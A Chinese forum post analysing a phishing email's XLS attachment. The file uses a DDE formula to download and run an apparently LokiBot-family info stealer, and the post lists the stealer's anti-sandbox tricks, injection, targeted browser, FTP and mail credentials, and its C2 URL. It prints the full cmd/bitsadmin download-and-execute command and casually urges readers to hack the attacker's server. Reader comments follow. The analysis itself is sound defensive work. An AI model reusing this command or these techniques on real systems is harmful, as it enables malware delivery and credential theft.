無碼原創丨藏匿在邮件里的“坏小子”

JustPlay

不知从什么时候开始，我的垃圾邮件开始暴增，而且主题千奇百怪，有“再也不用去澳门赌博”、“免保人、免抵押”…等推广主题；有“南北方压岁钱差距有多大？”、“爱过才知道什么是痛”…的段子主题；也有“+我微信 dw178gg”、“加扣扣 2848116852”...的交友主题；这些大部分都能从标题就能判断出来是垃圾邮件，像那种日文、繁体字糅杂在一起的邮件就很难辨别，每次我都要点开看一看里面有什么。咳咳，言归正传，这里面最让人头痛的还是藏匿在正常邮件里的病毒和钓鱼欺诈邮件，这些“坏小子”们可不仅仅骗个点击而已，稍有不慎我们损失的可能非常多...

一、基本信息[td]

文件名	xx电子账单.xls
SAH256	61472720ecd1f63f92593e271c0f1220001d0b2fe32a5ce732eb55c7b19c4e50

[td]

文件名	SwiftCopy.exe
SHA256	db34f7a1ed8dfaf299cc0024dfe8ee4d7e813a0f1e7bf5794db3676a4d07bdd5

这是我某个邮件中的 xls 文件，以及打开表格后下载的可疑文件。拿到可疑文件第一时间还是扔到“虚拟执行环境”中先让它自己可劲儿折腾一番，很快分析报告就出来了

很可惜，从沙箱报告中看不出特别关键的信息，只能从行为上看出些许端倪，接下来需要我手动开始分析了...
二、行为分析
上手之前准备工作要做足，先梳理下流程：

2.1 XLS 文件（Downloader）
原始样本是一个 xls 文件，主要功能是作为一个 downloader。此文件使用了外部链接功能，这是一种除宏，漏洞之外的另一种载荷投递的方式。打开文件后会提示你更新，点击更新后又会让你确定是否要启动 cmd 进程。


点击文档中的 #REF！可以看到将要执行的命令行代码
=cmd|'/c @echo Set objShell = CreateObject("Wscript.Shell") > Gm.vbs& @echo objShell.Run "cmd /c bitsadmin /transfer 8 /download http://www.mva.by/tags/SwiftCopy.exe%temp%Gm.exe&%temp%Gm.exe",0,True >> Gm.vbs& Gm.vbs'!A0
样本会从 www.mva.by/tags 中下载 SwiftCopy.exe 存放到临时目录下，然后运行。

2.2 SwiftCopy.exe 文件
使用 PEiD 查一下壳，显示为 ASProtect，我的脱壳技术一塌糊涂，在网上找了一个 OD 的脚本，瞬间脱壳，感谢网友的分享，网友博客链接：https://blog.csdn.net/qingye2008/article/details/1898190脚本名为 Aspr2.XX_unpacker_v1.osc，大家可以从网上搜索一下这个名字，应该可以搜到。
脱完壳之后是一个 Delphi 程序，其主要目的是创建自身并注入，但是如果不经过九曲十八弯的操作显示不出他的强大，他会循环调用自身中的一些函数，调用次数为 0x3B，这些函数中大部分没什么实质性的作用，但是万万不可大意，这些函数中还有反沙箱的操作，通过获得光标的值，判断光标是否在移动，而且这个循环会连续循环 7 次。

最终样本会创建自身并注入，不用想，重点功能肯定在注入的这部分代码中。

2.3 子进程
待到父进程调用 ZwResumeThread 时附加到目标进程中，代码结构比较简单，如果参数中有-u参数，将会睡眠一段时间。

值得一提的是，程序中调用的系统函数都是动态获得的，从而大大增加了静态分析的难度。

此样本的重点功能就是信息窃取，可以说是相当的全面，循环调用函数，可以看到循环次数为 101，窃取的信息包含浏览器信息，邮箱信息，远程登陆客户端信息等。

此时的程序已经没有了混淆，进入函数后就可以看到程序要窃取信息的目标。

对这些函数进行统计，获得的信息如下（可以说是相当全面）
浏览器类：
Internet Explorer，Mozilla Firefox，Google Chrome，KMeleon，Comodo Dragon，Comodo IceDragon，SeaMonkey，Opera，Safari，CoolNovo，Rambler Nichrome，RockMelt，Baidu Spark，Chromium，Titan Browser，Torch Browser，Yandex.Browser，Epic Privacy Browser，Sleipnir Browser，Vivaldi，Coowon Browser，Superbird Browser，Chromodo Browser，Mustan Browser，360 Browser，Cyberfox (x32+x64)，Pale Moon，Maxthon browser，Citrio Browser，Chrome Canary，Waterfox，Orbitum，Iridium，
读取浏览器的ini文件

读取登录数据



远程登录客户端类：
TotalCommander，FlashFXP，FileZilla，FARManager，CyberDuck，Bitvise，NovaFTP，NetDrive，NppFTP，FTPShell，SherrodFTP，MyFTP，FTPBox，FtpInfo，LinesFTP，FullSync，NexusFile，JaSFtp，FTPNow，Xftp，EasyFTP，GoFTP，NETFile，BlazeFtp，StaffFTP，DeluxeFTP，ALFTP，FTPGetter，WS_FTP，AbleFTp，Automize，RealVNC，TightVNC，Syncovery，mSecureWallet，SmartFTP，FreshFTP，BitKinex，UltraFXP，FTPRush，VandykSecureFX，OdinSecureFTPExpert，Fling，ClassicFTP，Maxthonbrowser，Kitty(login+privatekey)，WinSCP，RemminaRDP，WinFTP，32BitFTP，FTPNavigator
获取用户名和密码



邮箱类：Outlook，MozillaThunderbird，Foxmail，Pocomail，Incredimail，GmailNotifierPro，SNetzMailer，Checkmail，OperaMail，FossaMail，MailSpeaker，yMail
获取用户名和密码


样本会根据不同的目标，通过不同的方式窃取数据，可见作者对这些信息相当熟悉。最终样本会将获得的信息发送到服务端，分析此样本捕获到的 url 为 http://admino.gq/stan/ Panel/fre.php此域名对应的 IP 为 103.63.2.227，通过情报社区查询，标签有垃圾邮件、钓鱼。红客大佬们可以尝试入侵入侵，看看攻击者截获了多少信息。

接着样本会在 Roming 目录下创建一个文件夹，并将自身拷贝过去，命名为 618D9F. exe，并且将文件属性设置为隐藏。最后还将在一个无限循环中创建线程，此线程会调用窃取信息的函数，删除目标文件，下载文件并执行。
三、总结
其实这些使用电子邮件和主题吸引用户阅读并打开附件，大部分是针对企业或组织。“坏小子”们伪装的方式非常多，潜伏在一些 DOC、XLS、EXE 等常见的文件格式中也会让人放松警惕，一旦盲目打开或点击电子邮件中的链接，后果可能非常严重！最好的办法就是不要打开他们，不要冒任何感染风险，除非你会使用沙箱产品或具备文件分析的能力。
P.S. 这个样本功能齐全，信息量相当大，我也只分析个皮毛，对这个样本感兴趣的朋友们可以到微步云沙箱下载继续深度分析，肯定能够学到很多知识。
报告地址如下：https://s.threatbook.cn/report/file/db34f7a1ed8dfaf299cc0024dfe8ee4d7e813a0f1e7bf5794db3676a4d07bdd5/?env=win7_sp1_enx86_office2013&utm_campaign=analysis&utm_medium=tz&utm_source=Adconly&gio_link_id=nRbrzDR3

山高人为蜂

企业里很多文员对电脑的操作仅存在会开机、运动鼠标、打开文件、保存文件、关机的水平，甚至电源插头没插紧、显示器没开，也会大叫电脑坏了的水平(本人亲历)，对这些伪装得很深的木马病毒，根本是没有防范的。他们大多数靠安全软件，而安全软件也并不是万能的。

mortalboold

lokibot家族的

坐久落花多

一般情况下，只要心理有防范都不会去点链接或者打开附件吧

锋哥style

我不懂这是啥，但是我看到标题上的无码 ，不由自主的I点进来了。。

Dream_G

无码 ？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？

mancong122

老哥这虚拟分析环境不错啊，指点一波？？？

suiyuan3314

什么东东？

gulumogui

这和无码原创有什么关系？请问

杀阡陌爱花千骨

厉害了，这个技术分析帖子很6，